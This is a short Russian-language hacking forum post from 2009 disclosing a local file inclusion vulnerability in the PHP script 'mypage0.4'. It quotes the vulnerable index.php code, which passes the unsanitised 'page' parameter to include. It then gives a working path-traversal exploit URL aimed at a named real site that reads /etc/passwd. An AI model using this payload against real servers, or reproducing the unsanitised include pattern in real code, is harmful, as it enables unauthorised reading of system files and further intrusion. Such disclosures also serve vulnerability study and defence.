
14.11.2009, 12:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
mypage0.4
http://qgotchi.sourceforge.net/index.php
LFI
index.php
PHP код:
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}
http://qgotchi.sourceforge.net/index.php?page=../../../../../../../../etc/passwd
|
|
|